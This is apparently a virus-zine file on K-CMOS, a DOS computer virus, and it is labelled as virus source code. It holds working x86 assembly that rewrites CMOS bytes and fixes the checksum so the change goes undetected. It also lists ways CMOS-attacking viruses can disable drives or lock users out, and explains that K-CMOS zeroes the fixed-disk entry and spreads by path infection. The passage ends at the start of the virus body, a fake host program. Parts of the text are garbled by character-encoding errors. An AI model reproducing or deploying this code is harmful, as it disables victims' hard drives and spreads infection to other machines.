k-cmos.asm

一些病毒源代码

CMOS_CHCKSM:

; INPUT:
; DL = CMOS ADDRESS of BYTE TO be MODiFiED
; BL = NEW BYTE VALUE to be PUT IN CMOS RAM

; OUTPUT:
; None.
; REGISTERS USED: AX,CX,BX,DX

;*************************
; GET CMOS Checksum => CX
;*************************

        xor     ax,ax
        mov     al,2Eh           ;msb of checksum address
        out     70h,al           ;send address / control byte
        in      al,71h           ;read byte

        xchg    ch,al            ;store al in ch

        mov     al,2Fh           ;lsb of checksum address
        out     70h,al           ;send address / control byte
        in      al,71h           ;read byte

        xchg    cl,al            ;store lsb to cl

;*********************
; Fix CMOS Checksum
;*********************

        push    dx
        xchg    dl,al           ;AL = address
        out     70h,al          ;send address / control byte
        in      al,71h          ;read register

        sub     cx,ax           ;subtract from checksum

        add     cx,bx           ;update checksum value in register.

;****************************
; Write CMOS byte to Address
;****************************

        pop     dx
        xchg    dl,al           ;AL = address
        out     70h,al          ;specify CMOS address
        xchg    al,bl           ;new CMOS value => al

        out     71h,al          ;write new CMOS byte

;*********************
; Write CMOS Checksum
;*********************

        mov     al,2Eh          ;address of checksum 's msb
        out     70h,al          ;specify CMOS address
        xchg    al,ch           ;msb of new checksum

        out     71h,al          ;write new CMOS msb

        mov     al,2Fh          ;address of checksum 's lsb
        out     70h,al          ;specify CMOS address
        xchg    al,cl           ;lsb of new checksum

        out     71h,al          ;write new CMOS lsb
        ret

;==============================================================================


             It is worth mentioning that for XT (8088) type computers
         the CMOS routine will have no adverse effects in the
         execution of the virus-infected program.

             There are many intriguing features of CMOS-attacking 
         viruses: The biggest one is the interaction between software
         and CMOS is not stopped by common anti-virus memory
         resident programs. The most talked about example of such
         a virus is the South African EXEbug, which uses CMOS
         manipulation to make itself difficult to remove from an
         infected hard disk. EXEbug massages the CMOS so that if
         the machine is booted from a diskette and the virus is
         not in memory, the infected hard disk is not recognized.

         The list of possible problems created by a CMOS
         attacking virus is long:

         1 - CMOS checksum errors.
         This will force the user to reenter all of the CMOS data.
         Change any value in the correct CMOS range without
         updating the checksum.

         2 - Dead disk / hard drives.
         This could drive the uninformed to presume they have
         encountered a hardware problem.

         3 - Changed hardrive types, horrendous hardrive problems.
         For example: Input the hardrive type byte, subtract some small
         digit from it and output the byte to the CMOS. (The checksum
         must be fixed!) and a horrible mess results on subsequent
         boot up.

         4 - Changed dates, times, etc.
         The uninformed could thing the Nicad battery has died,
         or that his/her computer is possessed by evil, Nigerian
         Deities.

         5 - Changed BIOS passwords, inability to access a computer.
         On newer AMI BIOSes you can set or change the password
         required to access the computer.  This topic was discussed
         briefly in a recent issue of Virus News International, the 
         upshot being that the unsuspecting could be flummoxed into
         throwing the computer out the window, or more realistically,
         calling a technician. In the case where some knowledge about 
         computers is present, the case is opened and the jumper
         found to short the CMOS. (No, you don't have to disconnect 
         the battery.  And you didn't throw out your machine manuals
         did you?)

             Although many anti-virus programs can save and restore
         your CMOS values as part of their function, currently there 
         is only one memory resident program that checks for changes 
         in the CMOS: Thunderbyte's TBMEM.

             This month's example, K-CM擲, falls in category #2: it
         kills all fixed disk drives by zeroing out location 12h in
         the CMOS RAM. It also has some encryption abilities (a 16
         byte constant decryptor) and a PATH style infection routine
         that actually works!
         
         Needless to say, careful handling is necessary as it can
         spread quite rapidly.

         Important: Since K-CMOS zero's the CMOS value for the fixed
         disk on execution, unless you restore the value before ending
         your experiment with some software CMOS reloading tool, you
         will have a dead C: drive when you finally get around to
         rebooting.  Keep in mind that if you don't know how to reset
         your CMOS on power up using the built in BIOS setup, you will
         sit there in a dumb stew wondering why you ran a virus which
         unhooked your hard drive.

         To prevent this from happening, you must familiarize yourself
         with the BIOS setup program. Here is a brief walkthrough which
         could be used to properly restore your machine after K-CMOS
         has altered your CMOS:
         
         1 - BEFORE you execute K-CMOS - on power up, bring up your 
         BIOS setup by holding down the DEL key while you are booting 
         the computer. 
         
         2 - You will probably see a screen with a number of selections.
         You will want to bring up "Change Basic CMOS Settings" or its
         equivalent. Write down the values for the HD types on drives 
         C and D.

         3- IF the hard drive types are "47" the you MUST record all 
         of the data in the displayed fields, i.e, the information 
         such as the number of heads, sectors, etc. Again, you MUST 
         do this BEFORE you run K-CMOS or you will have to look in 
         your manuals somewhere to get the specific HD information!

         NOTE: Newer AMI BIOSes have an auto-detect feature in the 
         Setup menu, so you might not have to worry about hard disk type 
         number, number of sectors, number of heads, etc., if you have 
         the feature in your computer's BIOS. The setup will do the 
         work for you.

         4 - Now that you've recorded this data, you can test K-CMOS
         and watch it unhook your system.  On reboot, you will lose the
         hard disk.  Reboot, bring up your Setup program as above, re-
         enter the values for the hard disk which you previously 
         recorded, exit and save.  You are back in business.

         Enjoy!

$

;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
;                                K-CM擲.ASM
;                            AUTHOR:  K攈ntark
;                           DATE:    November 93
;                           Size: <  1100 bytes
;
;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

MAIN    SEGMENT BYTE
        ASSUME cs:main,ds:main,ss:nothing      ;all part in one segment=com file
        ORG    100h

;**********************************
;  fake host program
;**********************************

HOST:
        db    0E9h,0Ah,00          ;jmp    NEAR PTR VIRUS
        db     ' '
        db     90h,90h,90h
        mov    ah,4CH
        mov    al,0
        int    21H                 ;terminate normally with dos

;屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯